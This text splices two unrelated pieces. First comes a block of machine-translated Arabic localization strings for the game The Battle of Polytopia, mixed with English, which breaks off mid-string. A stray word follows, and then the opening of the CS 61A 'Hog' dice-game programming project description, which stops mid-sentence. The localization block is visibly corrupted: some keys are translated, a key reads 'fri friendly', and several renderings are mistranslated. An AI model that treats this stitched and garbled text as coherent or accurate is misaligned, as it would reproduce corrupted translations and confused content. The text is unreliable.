"اقتل 10 أعداء في المعركة" ، "polyplayer.task.wealth.title": "الثروة"، "polyplayer.task.wealth.description": "جمع 100 نجمة" ، "polyplayer.task.genius.title": "Genius" ، "polyplayer.task.genius.description": "اكتشف كل التقنيات المتاحة" ، "polyplayer.task.metropolis.title": "Metropolis"، "polyplayer.task.metropolis.description": "أنشئ مدينة من المستوى الخامس"، "polyplayer.task.network.title": "الشبكة" ، "polyplayer.task.network.description": "اربط 5 مدن بعاصمتك" ، "task.info": "{0} للحصول على {1}" ، "price.stars": "star"، "price.stars.plural": "stars"، "price.population": "Population"، "price.population.plural": "Population"، "price.points": "point"، "price.points.plural": "Points"، "wcontroller.online.yourturn.title": "إنه دورك!"، "wcontroller.online.yourturn.description": "انقر على" موافق "لمتابعة اللعبة عندما تكون جاهزًا."، "wcontroller.convertvillage.description": "يوافق القرويون على الانضمام إلى إمبراطوريتك الناشئة!" ، "wcontroller.convertvillage.title": "تم تحويل القرية!"، "wcontroller.capital.regained.description": "لقد استعدت السيطرة على رأس المال الخاص بك ، وأعيد إنشاء شبكات التجارة" ، "wcontroller.capital.regained.title": "أخبار رائعة!"، "wcontroller.capital.lost.description": "تم الاستيلاء على رأس مالك بواسطة جحافل {0}! تم إلغاء جميع اتصالاتك التجارية حتى تستعيد السيطرة على رأس مالك" ، "wcontroller.capital.lost.title": "أخبار سيئة!"، "wcontroller.capital.captured.description": "لقد استولت على رأس مال {0}! تم إلغاء جميع اتصالاتهم التجارية حتى يستعيدوا السيطرة على رأس مالهم" ، "wcontroller.capital.captured.title": "أخبار رائعة!"، "wcontroller.capital.captured2.description": "{0} هي الآن جزء من {1} الإمبراطورية" ، "wcontroller.capital.captured2.title": "استولت المدينة!"، "wcontroller.kill.upgrade.description": "الوحدة جاهزة للترقية!" ، "wcontroller.kill.upgrade.title": "Level Up!"، "wcontroller.examine.water.elyrion": "لقد صادفت {0} مسحورًا انضم إلى قبيلتك!" ، "wcontroller.examine.water": "لقد واجهت عصابة من القراصنة الودودين الذين انضموا إلى قبيلتك!" ، "wcontroller.examine.water.title": "سفينة المعركة" ، "wcontroller.examine.giant": "لقد وجدت {0} صديقًا انضم إلى قبيلتك!" ، "wcontroller.examine.explorer": "تقابل بعض السكان المحليين الذين يظهرون لك الأراضي المحيطة."، "wcontroller.examine.explorer.title": "Explorer"، "wcontroller.examine.tech": "لقد عثرت على بعض اللفائف القديمة التي تحتوي على سر {0}."، "wcontroller.examine.tech.title": "مخطوطات الحكمة"، "wcontroller.examine.stars": "الآثار القديمة مليئة بالموارد القيمة!"، "wcontroller.examine.stars.title": "الموارد"، "wcontroller.examine.population": "تلتقي بقبيلة بدوية تستقر في عاصمتك!"، "wcontroller.examine.population.title": "السكان"، "wcontroller.move.unto.unit": "لا يمكن الانتقال إلى وحدة أخرى" ، "wcontroller.building.upgrade": "تمت ترقية {0} إلى {1}!"، "wcontroller.building.upgrade.reward": "{0} تمت الترقية إلى المستوى {1} وزاد إنتاجه +1. يمكنك أيضًا اختيار مكافأة إضافية:"، "wcontroller.reward.workshop": "Workshop"، "wcontroller.reward.citywall": "جدار المدينة"، "wcontroller.reward.populationgrowth": "النمو السكاني"، "wcontroller.reward.park": "park"، "wcontroller.reward.explorer": "explorer"، "wcontroller.reward.resources": "resources"، "wcontroller.reward.bordergrowth": "نمو الحدود"، "wcontroller.reward.superunit": "super unit"، "wcontroller.unit.promotion": "اكتسبت وحدتك حالة المحاربين القدامى! زادت الصحة."، "wcontroller.unit.promotion.title": "تم ترقية الوحدة!"، "wcontroller.meet.tribe.leader": "قائدهم"، "wcontroller.meet.tribe.bigger.hostile": "يضحك على عذرك الضئيل لقبيلة."، "wcontroller.meet.tribe.bigger.fri friendly": "تحية لك ودودًا لكنها لا تولي اهتمامًا لمملك الصغير."، "wcontroller.meet.tribe.smaller.hostile": "يبدو عدائيًا بعض الشيء ويحييك بشكل مريب."، "wcontroller.meet.tribe.smaller.fri friendly": "انحناءات في رهبة حضارتك العظيمة."، "wcontroller.meet.tribe.tech.hostile": "يمكنك سرقة سر {0}!"، "wcontroller.meet.tribe.tech.fri friendly": "كبادرة حسن نية ، يشاركون سر {0}!" ، "wcontroller.meet.tribe.resource.hostile": "يمكنك سرقة بعض القطع الذهبية الثمينة!"، "wcontroller.meet.tribe.resource.fri friendly": "إنهم يقدمون لك هدية من الموارد القيمة!" ، "wcontroller.tribe.destroy": "لقد دمرت {0}!"، "wcontroller.tribe.destroy.title": "Blood!"، "wcontroller.tribe.destroy2": "تم تدمير {0} بواسطة {1}!"، "wcontroller.tribe.destroy.all": "لقد دمرت كل القبائل المعارضة ووحدت الساحة بأكملها تحت إمرتك!" ، "wcontroller.tribe.destroy.all.title": "الهيمنة!"، "wcontroller.city.disconnect": "تم قطع اتصال {0} بـ {1}" ، "wcontroller.city.disconnect.title": "فقد طريق التجارة!"، "wcontroller.turn.end": "إنهاء الدور ..."، "wcontroller.turn.saving": "جارٍ حفظ اللعبة على الخادم ..."، "wcontroller.turn.notification": "حان دورك {0} (دوران {1})" ، "wcontroller.turn.passed": "تم تمرير اللعبة إلى {0}"، "wcontroller.turn.passed.title": "Turn Complete"، "wcontroller.turn.error": "تعذر الوصول إلى خادم اللاعبين المتعددين. يرجى التأكد من اتصالك بالإنترنت والمحاولة مرة أخرى."، "wcontroller.turn.error.title": "خطأ في الشبكة" ، "wcontroller.turn.next": "التالي"، "wcontroller.load.error": "لا توجد لعبة محفوظة لاستئنافها ، ابدأ لعبة جديدة!"، "wcontroller.load.error.title": "لا توجد لعبة محفوظة" ، "wcontroller.load.notpartof": "أنت لست جزءًا من هذه اللعبة" ، "wcontroller.load.wait": "انتظر حتى يتم تنزيل هذه اللعبة بالكامل قبل فتحها."، "wcontroller.load.wait.title": "جاري التحميل ..."، "wcontroller.load.update": "تستخدم هذه اللعبة إصدارًا أحدث من Polytopia ، يلزمك التوجه إلى {0} وتحديثه قبل أن تتمكن من اللعب."، "wcontroller.load.update.title": "التحديث مطلوب"، "wcontroller.removingplayer": "إزالة اللاعب"، "wcontroller.not.your.turn": "عذرًا ، لم يحن دورك بعد!"، "technology.intro": "ستعمل هذه التقنية على تمكين ما يلي:"، "technology.build": "{0} يجعل من الممكن إنشاء {1}" ، "technology.movement": "الحركة"، "technology.movement.info": "تمكن الحركة في {0}" ، "technology.defence": "مكافأة الدفاع"، "technology.defence.info": "يمنح وحدتك قوة إضافية عند الدفاع بـ {0}"، "technology.task": "{0} ينشط {1} المهمة" ، "قابلية التكنولوجيا": "القدرة"، "technology.ability.info": "{1} يمنحك القدرة على {1}"، "technology.names.basic": "أساسي"، "technology.names.riding": "ركوب الخيل"، "technology.names.freespirit": "Free Spirit" ، "technology.names.chivalry": "الفروسية" ، "technology.names.roads": "Roads"، "technology.names.trade": "التجارة" ، "technology.names.organization": "Organization"، "technology.names.shields": "Shields"، "technology.names.farming": "الزراعة" ، "technology.names.construction": "Construction"، "technology.names.fishing": "صيد السمك" ، "technology.names.whaling": "صيد الحيتان"، "technology.names.aquatism": "المائية" ، "technology.names.sailing": "الإبحار" ، "technology.names.navigation": "تصفح" ، "technology.names.hunting": "صيد" ، "technology.names.forestry": "الغابات" ، "technology.names.mathematics": "Mathematics"، "technology.names.archery": "الرماية"، "technology.names.spiritualism": "الروحانية" ، "technology.names.climbing": "التسلق" ، "technology.names.meditation": "تأمل" ، "technology.names.philosophy": "الفلسفة" ، "technology.names.mining": "Mining"، "technology.names.smithery": "Smithery"، "technology.names.freediving": "الغوص الحر" ، "technology.names.spearing": "Spearing"، "technology.names.forestmagic": "سحر الغابة" ، "technology.names.watermagic": "Water Magic" ، "technology.names.frostwork": "Frostwork"، "technology.names.polarwarfare": "Polar Warfare" ، "technology.names.polarism": "Polarism"، "techview.info": "تزداد تكاليف التكنولوجيا لكل مدينة في إمبراطوريتك."، "techview.info.literacy": "معرفة القراءة والكتابة تقلل من سعر جميع التقنيات بنسبة 20٪!" ، "techview.locked": "(مغلق)" ، "techview.locked.info": "يجب عليك البحث {0} قبل أن تتمكن من تعلم {1}."، "techview.completed": "(مكتمل)" ، "techview.completed.info": "لقد بحثت بالفعل عن هذه التقنية."، "techview.expensive.info": "ليس لديك ما يكفي من النجوم لشراء هذا. انقر على" المنعطف التالي "للحصول على المزيد من النجوم."، "techview.research": "بحث" ، "action.info.attack": "قم بهجوم بهذه الوحدة. حدد الوحدة وانقر فوق أي من أهداف RED إذا كنت تريد الهجوم" ، "action.info.recover": "استرداد" ، "action.info.healothers": "شفاء الآخرين" ، "action.info.train": "قم بتدريب وحدة في هذه المدينة. يمكن استخدام الوحدات لاستكشاف العالم ومهاجمة الأعداء والدفاع عن مدينتك" ، "action.info.move": "انقل هذه الوحدة. حدد الوحدة وانقر فوق أي من الأهداف الزرقاء" ، "action.info.capture": "أسر" ، "action.info.capture2": "استحوذ على هذه المدينة. المدن تولد النجوم في كل منعطف يمكنك استخدامه لتطوير إمبراطوريتك" ، "action.info.destroy": "إتلاف" ، "action.info.disband": "Disband {0}"، "action.info.remove": "إزالة" ، "action.info.cityreward": "City Reward" ، "action.info.reward": "Reward"، "action.info.trip": "رحلة"، "action.info.meet": "Meet"، "action.info.promote": "ترقية" ، "action.info.examine": "فحص" ، "action.info.endturn": "قم بإنهاء هذا المنعطف للحصول على المزيد من الموارد وتحركات الوحدة. اضغط على زر" المنعطف التالي "" ، "action.info.stay": "Stay"، "action.info.healarea": "healArea" ، "action.info.freezearea": "منطقة التجميد" ، "action.info.breakice": "كسر الجليد" ، "action.info.do": "افعل {0} هنا" ، "action.info.build": "إنشاء {0} هنا" ، "action.info.reward.population": "سيؤدي ذلك إلى زيادة عدد سكان أقرب مدينة. عندما يصبح عدد السكان كبيرًا بما يكفي ، سترتفع المدينة وتنتج المزيد من الموارد" ، "action.info.reward.resources": "هذا سيمنحك مكافأة فورية {0} من الموارد" ، "action.info.research": "بحث {0}."، "actionbtn.upgrade": "ترقية إلى {0}"، "actionbtn.remove.building": "Building"، "actionbtn.remove.roads": "الطرق" ، "stringtools.typelist.and": "و" ، "topbar.score": "النتيجة"، "topbar.turn": "Turn"، "topbar.stars": "نجوم (+ {0})"، "Bottommenu.gamestats": "إحصائيات اللعبة" ، "Bottommenu.menu": "Menu"، "Bottommenu.nextturn": "المنعطف التالي" ، "Bottommenu.techtree": "شجرة التكنولوجيا" ، "endscreen.done": "تم"، "endscreen.ruledby": "محكومة بواسطة {0}"، "endscreen.army & region": "الجيش والأراضي"، "endscreen.monuments and المعابد": "الآثار والمعابد"، "endscreen.cities": "المدن"، "endscreen.science": "Science"، "endscreen.units": "{0} الوحدات ، {1} إمبراطورية البلاط" ، "endscreen.culture": "{0} monuments، {1} temples"، "endscreen.citiescount": "{0} Cities"، "endscreen.techscore": "{0} / {1} التقنيات التي تم البحث عنها"، "endscreen.bonus": "مكافأة الصعوبة"، "endscreen.finalscore": "النتيجة النهائية"، "endscreen.speedskills": "مهارات السرعة"، "endscreen.domination.win": "{0} / {1} turn"، "endscreen.domination.loss": "{0} turn"، "endscreen.battle": "مهارات المعركة"، "endscreen.battle.info": "فقدت {0} وحدة"، "endscreen.destroyed": "قبائل دمرت"، "endscreen.destroyed.info": "{0} / {1}"، "endscreen.rating": "تصنيف الصعوبة"، "endscreen.finalrating": "التصنيف النهائي"، "endscreen.nextstar.percent": "{0}٪ مطلوبة للنجمة التالية"، "endscreen.nextstar": "{0} مطلوب للنجمة التالية"، "endscreen.topresult": "أفضل نتيجة جديدة!"، "endscreen.topresult.title": "عظيم!"، "endscreen.personal": "شخصية جديدة عالية الجودة طوال الوقت!"، "endscreen.personal.title": "مدهش!"، "endscreen.showhiscore": "SHOW HISCORE"، "endscreen.winner": "{0} win!"، "endscreen.victory": "انتصار"، "endscreen.gameover": "انتهت اللعبة"، "highscore.title": "درجة عالية"، "highscore.today": "Today"، "highscore.thisweek": "هذا الأسبوع" ، "highscore.alltime": "كل الأوقات"، "highscore.alltribes": "جميع القبائل" ، "highscore.hiscore": "hiscore"، "highscore.loading": "جارٍ التحميل .."، "highscore.notavailable": "High Score not available."، "multiplayer.passplay": "Pass & Play"، "multiplayer.passplay.info": "تحدي أصدقائك في مباراة متعددة اللاعبين على نفس الجهاز. فقط قم بتمريرها إلى اللاعب التالي عندما ينتهي دورك."، "multiplayer.activegames": "الألعاب النشطة" ، "multiplayer.finishedgames": "Finished Games" ، "multiplayer.creategame": "إنشاء لعبة" ، "multiplayer.clipboard": "تمت إضافة Gamedata إلى الحافظة" ، "multiplayer.clipboard.title": "Voilà!"، "gamestats.gamemode": "وضع اللعبة: {0}"، "gamestats.bonus": "مكافأة الصعوبة: {0}"، "gamestats.speed": "مهارات السرعة"، "gamestats.speed.info": "{0} / {1} دورة"، "gamestats.battle": "مهارات القتال" ، "gamestats.battle.info": "{0} فاز ، {1} خسر"، "gamestatus.tribes": "القبائل دمرت" ، "gamestatus.difficulty": "تصنيف الصعوبة"، "gamestatus.capitals": "Capitals Owned"، "gamestatus.scores": "النتائج"، "gamestatus.ruled": "محكومة بواسطة {0}" ، "gamestatus.ruled.you": "تحكمها أنت" ، "gamestatus.unknown.tribe": "قبيلة غير معروفة"، "gamestatus.unknown.ruler": "مسطرة غير معروفة" ، "gamestatus.score": "النتيجة: {0} نقطة"، "gamestatus.city": "{0} city"، "gamestatus.cities": "{0} Cities"، "gamestatus.destroyed": "مدمر"، "gamestatus.tasks": "المهام {0} / {1}"، "gamestatus.tasks.complete": "مكتمل!" ، "settings.title": "إعدادات"، "settings.volume": "مستوى الصوت {0}"، "settings.soundeffects": "تأثيرات صوتية"، "settings.ambience": "Ambience"، "settings.tribemusic": "Tribe Music"، "settings.suggestions": "اقتراحات" ، "settings.info": "معلومات حول الإنشاء" ، "settings.confirm": "تأكيد الدور" ، "settings.saveexit": "EXIT TO MENU" ، "settings.on": "تشغيل" ، "settings.off": "OFF" ، "settings.language": "Language"، "settings.restartlanguage": "الرجاء إعادة تشغيل Polytopia لتبديل اللغة بالكامل" ، "settings.language.load.title": "لغة مخصصة (نسخة تجريبية)" ، "settings.language.load.info": "قم بتحميل ملف لغة Polytopia من خادم بعيد باستخدام https. هذه ميزة تجريبية وليست لأصحاب القلوب الضعيفة."، "settings.language.load.input": "عنوان url لملف اللغة:"، "settings.language.load.button": "LOAD" ، "throne.title": "THRONE ROOM"، "throne.reset": "إعادة تعيين النتائج"، "throne.playerinfo": "معلومات اللاعب"، "throne.playerid": "معرف اللاعب" ، "throne.clipboard": "تمت إضافة معرف المشغل إلى الحافظة"، "throne.clipboard.title": "Voilà!"، "throne.alias": "الاسم المستعار" ، "throne.played": "تم تشغيل الألعاب"، "throne.topscore": "أعلى نتيجة"، "throne.toprating": "Top Rating"، "throne.resetwarning": "هل أنت متأكد من أنك تريد إعادة تعيين جميع درجاتك وتقييماتك المحفوظة؟ لا يمكن التراجع عن هذا."، "throne.resetwarning.title": "إعادة تعيين النتائج"، "throne.reset.complete": "تم إعادة تعيين النتائج الآن" ، "throne.google.achievements": "الإنجازات"، "throne.google.signedin": "لقد قمت بتسجيل الدخول باستخدام Google Play" ، "throne.google.out": "تسجيل الخروج"، "throne.google.info": "(!) تحتاج إلى تسجيل الدخول باستخدام Google Play لحفظ بيانات اللعبة والنتائج العالية." ، "throne.google.in": "تسجيل الدخول" ، "consent.approval.title": "مرحبًا بكم في Polytopia!" ، "consent.approval.info": "لتحسين Polytopia بإحصائيات الاستخدام ولتخزين درجاتك العالية وإعداداتك ، نحتاج إلى موافقتك للوصول إلى بعض البيانات الشخصية. \ n يمكنك قراءة المزيد حول البيانات التي نجمعها في <u> < a href = '{0}'> سياسة الخصوصية </a> </u>. \ n (يمكنك إبطال موافقتك في أي وقت في 'Throne Room') "، "Accept.approve": "الموافقة"، "Accept.deny": "DENY"، "Accept.enabled": "البيانات الشخصية ممكّنة"، "consent.enabled.info": "أنت تسمح حاليًا لـ Polytopia بالوصول إلى بعض البيانات الشخصية لتحسين الخدمة وتخزين نتائجك العالية وما إلى ذلك. لمزيد من المعلومات ، اقرأ <u> <a href='{0}'> سياسة الخصوصية < / a> </u>. "، "Accept.disabled": "البيانات الشخصية معطلة"، "consent.disabled.info": "لحفظ البيانات الشخصية مثل النتائج العالية وإحصاءات الاستخدام ، نحتاج إلى موافقتك. لمزيد من المعلومات ، اقرأ <u> <a href='{0}'> سياسة الخصوصية </a> < / u>. "، "موافقة.إلغاء": "إبطال الموافقة" ، "onlineview.title": "MULTIPLAYER"، "onlineview.loadingservice": "خدمة التحميل" ، "onlineview.yourturn": "دورك" ، "onlineview.theirturn": "دورهم" ، "onlineview.reloading": "إعادة التحميل .."، "onlineview.reloading.release": "حرر لإعادة التحميل ..."، "onlineview.newgame": "لعبة جديدة" ، "onlineview.friends": "الأصدقاء"، "onlineview.profile": "الملف الشخصي" ، "onlineview.passplay": "Pass & Play"، "onlineview.refresh": "تحديث" ، "onlineview.profile.available": "الملف الشخصي متاح فقط عند الاتصال بالخادم."، "onlineview.friendlist.available": "قائمة الأصدقاء متاحة فقط عند الاتصال بالخادم."، "onlineview.servicedisabled": "تم تعطيل خادم اللاعبين المتعددين مؤقتًا ، يرجى المحاولة مرة أخرى لاحقًا. تأكد أيضًا من أنك تستخدم أحدث إصدار من Battle of Polytopia." ، "خطأ onlineview.load": "تعذر الاتصال بخادم اللاعبين المتعددين. تحقق من اتصالك بالإنترنت وحاول مرة أخرى."، "onlineview.uptodate": "تم تحديث جميع الألعاب" ، "onlineview.intro.fix": "مرحبًا {0}! \ n \ n للعب متعدد اللاعبين عبر الإنترنت ، هناك بعض الأشياء التي تحتاج إلى إصلاحها:"، "onlineview.intro.update": "متعددة اللاعبين عبر الإنترنت غير متاحة ، يرجى تحديث Polytopia إلى أحدث إصدار" ، "onlineview.gameinvitations": "دعوات الألعاب" ، "onlineview.nogames.intro": "مرحبًا {0}!"، "onlineview.nogames.start": "لنبدأ تشغيل بعض الألعاب عبر الإنترنت مع أصدقائك. انقر على" لعبة جديدة "لبدء واحدة."، "onlineview.nogames.first": "أول شيء تحتاجه هو التواصل مع بعض البشر الآخرين الذين يلعبون Polytopia. انقر على" الأصدقاء "لإضافتهم."، "onlineview.or": "أو" ، "onlineview.passplay.start": "ابدأ إحدى ألعاب Pass & Play المحلية من خلال النقر على" لعبة جديدة "، "onlineview.login.ios": "تسجيل الدخول إلى {0}"، "onlineview.login.ios.info": "يضمن استخدام {0} أن يكون لديك معرف لاعب فريد وثابت يحافظ على بياناتك آمنة عبر الأجهزة."، "onlineview.notifications": "تمكين الإخطارات"، "onlineview.notifications.info": "We use notifications to communicate the status of your ongoing multiplayer games.", "onlineview.purchase": "Purchase one Tribe", "onlineview.purchase.info": "Running an online multiplayer service costs real money and we rely solely on the kind support from players like you.", "onlineview.completed": "completed", "onlineview.required": "required", "onlineview.check": "check", "onlineview.fixit": "FIX IT", "onlineview.clipboard": "Game ID added to clipboard: {0}", "onlineview.clipboard.title": "Voilà!", "onlineview.game.join": "JOIN GAME", "onlineview.game.start": "START GAME", "onlineview.game.open": "OPEN", "onlineview.game.size": "Map Size", "onlineview.game.moreinfo": "More info", "onlineview.game.gameinfo": "Game Info", "onlineview.game.you": "You", "onlineview.game.resign": "RESIGN", "onlineview.game.decline": "DECLINE", "onlineview.game.delete": "DELETE", "onlineview.game.resign.title": "Resign", "onlineview.game.resign.info": "Are you sure you want to leave this game permanently?", "onlineview.game.old.title": "Old file version", "onlineview.game.old.info": "This game was created with an outdated version of the game. It can unfortunately not be loaded :( My suggestion is that you delete it and start a new one. Sorry for the inconvenience.", "onlineview.game.player.left": "{0} has left the game {1} and has been replaced by a bot.", "onlineview.game.player.kicked": "You have been removed from game {0}", "onlineview.game.player.invited": "You are invited to a new game, {0}", "firebaseservice.status.connecting": "Connecting to the Polytopia server...", "firebaseservice.status.loading": "Loading game data...", "firebaseservice.status.loading.count": "Loading game data, {0} left", "firebaseservice.status.loading.player": "Loading player data...", "firebaseservice.status.sync": "Sync chronometer..", "firebaseservice.status.sync.player": "Syncing your player data..", "firebaseservice.status.checking": "Checking for changes..", "firebaseservice.status.loading.messages": "Loading messages...", "firebaseservice.important.title": "Important information", "firebaseservice.important.deleted": "{0} has deleted you from multiplayer game {1}", "firebaseservice.error": "There was an error saving the game. Please try again.", "firebaseservice.invite": "You are invited to a new game, {0}", "firebaseservice.removed": "You have been removed from game {0}", "friendlist.title": "FRIEND LIST", "friendlist.new.caps": "ADD FRIEND", "friendlist.new.title": "Add a new friend", "friendlist.new.info": "Enter the player ID of your friend. (they can find it on this Friend page on their device)", "friendlist.new.button": "ADD", "friendlist.new.input": "Player ID:", "friendlist.new.myself.title": "Me, myself & I", "friendlist.new.myself.info": "Seems like you tried to add yourself as a friend. That might sound like a nice thing to do but it would add an existential layer to the game that we cannot handle at the moment. Please submit a player ID of someone else.", "friendlist.new.empty.title": "Emptiness", "friendlist.new.empty.info": "The player ID you entered was completely empty! You should not try to make friends with the void, it is a very lonely path.", "friendlist.new.exists.title": "Duplicate Player", "friendlist.new.exists.info": "You are already friends with {0}", "friendlist.new.looking.title": "Loading Player", "friendlist.new.looking.info": "Looking for player {0}", "friendlist.new.added.title": "Player Added", "friendlist.new.added.info": "Added player {0}", "friendlist.new.error.title": "Error loading player", "friendlist.new.error.info": "Could not find player with the ID {0}.", "friendlist.new.error2.title": "Player not found", "friendlist.new.error2.info": "Could not find any player with the ID {0}. Error: {1}", "friendlist.loading": "Loading friends...", "friendlist.error": "Error loading friends", "friendlist.friends": "Friends", "friendlist.friends.old": "Outdated friends", "friendlist.local": "Local Players", "friendlist.bots": "Bots", "friendlist.bot": "{0} Bot", "friendlist.player": "Player {0}", "friendlist.remove": "REMOVE", "friendlist.reload": "RELOAD", "friendlist.checking": "Checking friend status..", "friendlist.friend.update": "{0} needs to update to the latest version of Polytopia before you can invite them to new games.", "friendlist.friend.updated": "{0} is now on the new server", "friendlist.friend.notupdated": "{0} is still on the old server", "friendlist.removed.title": "Player Removed", "friendlist.removed.info": "Removed player {0}", "idconsole.playerid": "Your Player ID:", "idconsole.share": "Send this Player ID to anyone you want to play against. Tap it to copy.", "idconsole.clipboard": "Player ID {0} added to clipboard", "idconsole.clipboard.title": "Voilà!", "playerpickerview.title": "PICK PLAYERS", "playerpickerview.name": "Game Name", "playerpickerview.startgame": "START GAME", "playerpickerview.addplayer": "ADD PLAYER", "playerpickerview.size": "Map size: {0} tiles", "playerpickerview.mode": "Game mode: {0}", "playerpickerview.players": "Players ({0}/{1})", "playerpickerview.you": "{0} (you)", "playerpickerview.bot": "{0} ({1} bot)", "playerpickerview.human": "No human player", "playerpickerview.human.info": "There needs to be at least one human player to start a game", "gameitem.join": "Join this game or decline the invitation", "gameitem.join.wait": "Waiting for {0} to pick tribe", "gameitem.ready": "Ready to start!", "gameitem.ready.wait": "{0} can start the game", "gameitem.turn.your": "Your turn", "gameitem.turn.other": "Waiting for {0}", "gameitem.gameover": "This game is over, tap to see the end.", "gameitem.pick": "{0}, pick your tribe", "gameitem.start": "{0}, start the game", "gameitem.turn": "{0}, take your turn", "gameitem.ended": "This game is over.", "gameitem.pending": "Pending. Open and save to server.", "gameitem.timeup": "Time Up!", "gameitem.timeup.info": "Your time to make a move is up, do you want to resign?", "gameitem.timelimit": "Time limit", "gameitem.timelimit.info": "You have {0} to make your move, after that you will be removed from the game.", "gameitem.kick": "Duh!", "gameitem.kick.info": "Do you want to kick {0} out of from this game? A bot will take control of the tribe.", "gameitem.kick.action": "KICK", "gameitem.slow": "Come on..", "gameitem.slow.info": "{0} has {1} to make a move. Send a rude reminder to make {0} hurry up?", "gameitem.slow.action": "REMIND", "gameitem.timeleft": "Cool runnings", "gameitem.timeleft.info": "{0} still has {1} to make a move.", "gameitem.reload": "RELOAD", "gameitem.remind.max": "That's enough", "gameitem.remind.max.info": "Reminder already sent to {0}", "gameitem.remind.notification": "We are waiting for you to play in {0}. Come on!!", "gameitem.remind.notify": "Done", "gameitem.remind.notify.info": "Reminder sent to {0}", "mplayerstats.title": "PLAYER PROFILE", "mplayerstats.clear": "clear data", "mplayerstats.reload": "reload multiplayer data", "mplayerstats.multiplayer.faq": "MULTIPLAYER FAQ", "mplayerstats.alias": "Alias", "mplayerstats.friends": "nº of friends", "mplayerstats.games": "Games Played", "mplayerstats.server": "Server version", "mplayerstats.lost": "Feeling lost? Check the:", "credits.title": "ABOUT", "credits.subtitle": "Indie Delight", "credits.midjiwan": "The Battle of Polytopia is constantly being created by Midjiwan, a tiny indie game studio in Stockholm, Sweden.", "credits.learnmore1": "Want to know everything?", "credits.learnmore2": "Check the extensive Wikia database created by the Polytopia community:", "c
flybunctious
Introduction In this project, you will develop a simulator and multiple strategies for the dice game Hog. You will need to use control statements and higher-order functions together, as described in Sections 1.2 through 1.6 of Composing Programs. In Hog, two players alternate turns trying to be the first to end a turn with at least 100 total points. On each turn, the current player chooses some number of dice to roll, up to 10. That player's score for the turn is the sum of the dice outcomes. To spice up the game, we will play with some special rules: Pig Out. If any of the dice outcomes is a 1, the current player's score for the turn is 1. Example 1: The current player rolls 7 dice, 5 of which are 1's. They score 1 point for the turn. Example 2: The current player rolls 4 dice, all of which are 3's. Since Pig Out did not occur, they score 12 points for the turn. Free Bacon. A player who chooses to roll zero dice scores one more than the largest digit in the opponent's total score. Example 1: If the opponent has 42 points, the current player gains 1 + max(4, 2) = 5 points by rolling zero dice. Example 2: If the opponent has 48 points, the current player gains 1 + max(4, 8) = 9 points by rolling zero dice. Example 3: If the opponent has 7 points, the current player gains 1 + max(0, 7) = 8 points by rolling zero dice. Swine Swap. After points for the turn are added to the current player's score, if both scores are larger than 1 and either one of the scores is a positive integer multiple of the other, then the two scores are swapped. Example 1: The current player has a total score of 37 and the opponent has 92. The current player rolls two dice that total 9. The opponent's score (92) is exactly twice the player's new total score (46). These scores are swapped! The current player now has 92 points and the opponent has 46. The turn ends. Example 2: The current player has 91 and the opponent has 37. The current player rolls five dice that total 20. The current player has 111, which is 3 times 37, so the scores are swapped. The opponent ends the turn with 111 and wins the game. Download starter files To get started, download all of the project code as a zip archive. You only have to make changes to hog.py. hog.py: A starter implementation of Hog dice.py: Functions for rolling dice hog_gui.py: A graphical user interface for Hog ucb.py: Utility functions for CS 61A ok: CS 61A autograder tests: A directory of tests used by ok images: A directory of images used by hog_gui.py Logistics This is a 2-week project. This is a solo project, so you will complete this project without a partner. You should not share your code with any other students, or copy from anyone else's solutions. Remember that you can earn an additional bonus point by submitting the project at least 24 hours before the deadline. The project is worth 20 points. 18 points are assigned for correctness, and 2 points for the overall composition of your program. You will turn in the following files: hog.py You do not need to modify or turn in any other files to complete the project. To submit the project, run the following command: python3 ok --submit You will be able to view your submissions on the Ok dashboard. For the functions that we ask you to complete, there may be some initial code that we provide. If you would rather not use that code, feel free to delete it and start from scratch. You may also add new function definitions as you see fit. However, please do not modify any other functions. Doing so may result in your code failing our autograder tests. Also, please do not change any function signatures (names, argument order, or number of arguments). Testing Throughout this project, you should be testing the correctness of your code. It is good practice to test often, so that it is easy to isolate any problems. However, you should not be testing too often, to allow yourself time to think through problems. We have provided an autograder called ok to help you with testing your code and tracking your progress. The first time you run the autograder, you will be asked to log in with your Ok account using your web browser. Please do so. Each time you run ok, it will back up your work and progress on our servers. The primary purpose of ok is to test your implementations, but there are two things you should be aware of. First, some of the test cases are locked. To unlock tests, run the following command from your terminal: python3 ok -u This command will start an interactive prompt that looks like: ===================================================================== Assignment: The Game of Hog Ok, version ... ===================================================================== ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Unlocking tests At each "? ", type what you would expect the output to be. Type exit() to quit --------------------------------------------------------------------- Question 0 > Suite 1 > Case 1 (cases remaining: 1) >>> Code here ? At the ?, you can type what you expect the output to be. If you are correct, then this test case will be available the next time you run the autograder. The idea is to understand conceptually what your program should do first, before you start writing any code. Once you have unlocked some tests and written some code, you can check the correctness of your program using the tests that you have unlocked: python3 ok Most of the time, you will want to focus on a particular question. Use the -q option as directed in the problems below. We recommend that you submit after you finish each problem. Only your last submission will be graded. It is also useful for us to have more backups of your code in case you run into a submission issue. The tests folder is used to store autograder tests, so do not modify it. You may lose all your unlocking progress if you do. If you need to get a fresh copy, you can download the zip archive and copy it over, but you will need to start unlocking from scratch. If you do not want us to record a backup of your work or information about your progress, use the --local option when invoking ok. With this option, no information will be sent to our course servers. Graphical User Interface A graphical user interface (GUI, for short) is provided for you. At the moment, it doesn't work because you haven't implemented the game logic. Once you complete the play function, you will be able to play a fully interactive version of Hog! In order to render the graphics, make sure you have Tkinter, Python's main graphics library, installed on your computer. Once you've done that, you can run the GUI from your terminal: python3 hog_gui.py Once you complete the project, you can play against the final strategy that you've created! python3 hog_gui.py -f Phase 1: Simulator In the first phase, you will develop a simulator for the game of Hog. Problem 0 (0 pt) The dice.py file represents dice using non-pure zero-argument functions. These functions are non-pure because they may have different return values each time they are called. The documentation of dice.py describes the two different types of dice used in the project: Dice can be fair, meaning that they produce each possible outcome with equal probability. Example: six_sided. For testing functions that use dice, deterministic test dice always cycle through a fixed sequence of values that are passed as arguments to the make_test_dice function. Before we start writing any code, let's understand the make_test_dice function by unlocking its tests. python3 ok -q 00 -u This should display a prompt that looks like this: ===================================================================== Assignment: Project 1: Hog Ok, version v1.5.2 ===================================================================== ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Unlocking tests At each "? ", type what you would expect the output to be. Type exit() to quit --------------------------------------------------------------------- Question 0 > Suite 1 > Case 1 (cases remaining: 1) >>> test_dice = make_test_dice(4, 1, 2) >>> test_dice() ? You should type in what you expect the output to be. To 